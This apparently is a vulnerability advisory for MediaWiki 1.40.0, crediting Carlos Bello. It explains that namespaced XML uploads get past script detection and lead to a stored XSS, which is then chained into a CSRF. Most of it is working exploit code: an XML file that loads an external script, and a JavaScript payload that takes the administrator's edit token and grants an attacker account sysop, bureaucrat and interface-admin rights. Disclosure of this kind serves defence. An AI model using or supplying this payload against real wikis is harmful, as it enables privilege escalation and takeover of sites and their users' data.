https://fluidattacks.com/advisories/blondie/ (behind login)
Reported by Carlos Bello, tested against MW 1.40.0
```name=exploit.xml,lang=xml
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="http://localhost:7777/payload.js">
</x:script>
```
```name=payload.js,lang=js
var token = "";
fetch('http://localhost:8080/mediawiki-1.40.0/index.php?title=Special%3AUserRights&user=Hacker', {
  credentials: 'include'
})
  .then(response => response.text())
  .then(html => {
    const parser = new DOMParser();
    const doc = parser.parseFromString(html, 'text/html');
    token = doc.getElementsByName('wpEditToken')[0].value;
    // Issue the second (POST) request once the token has been obtained
    return fetch('http://localhost:8080/mediawiki-1.40.0/index.php/Special:UserRights', {
      method: 'POST',
      credentials: 'include',
      headers: {'Content-Type': 'application/x-www-form-urlencoded'},
      body: 'user=Hacker&wpEditToken=' + encodeURIComponent(token) + '&conflictcheck-originalgroups=&wpExpiry-bot=infinite&wpExpiry-bot-other=&wpGroup-sysop=1&wpExpiry-sysop=infinite&wpExpiry-sysop-other=&wpGroup-interface-admin=1&wpExpiry-interface-admin=infinite&wpExpiry-interface-admin-other=&wpGroup-bureaucrat=1&wpExpiry-bureaucrat=infinite&wpExpiry-bureaucrat-other=&wpExpiry-suppress=infinite&wpExpiry-suppress-other=&user-reason=&saveusergroups=Save+user+groups'
    });
  })
  .then(response => {
    console.log('Respuesta:', response);
  })
  .catch(error => {
    console.error('Error:', error);
  });
```
>Description
>MediaWiki v1.40.0 does not validate namespaces used in XML files. Therefore, if the instance administrator allows XML file uploads, a remote attacker with a low-privileged user account can use this exploit to become an administrator by sending a malicious link to the instance administrator.
>
>Vulnerability
>In MediaWiki v1.40.0, an authenticated remote attacker can escalate his privileges through a Stored XSS. Thanks to this, we can perform a CSRF on an administrative account to escalate the privileges of an arbitrary account.
>
>The Stored XSS is caused by MediaWiki v1.40.0 not validating the namespaces used in XML files. Thanks to this we can bypass the script detection security controls.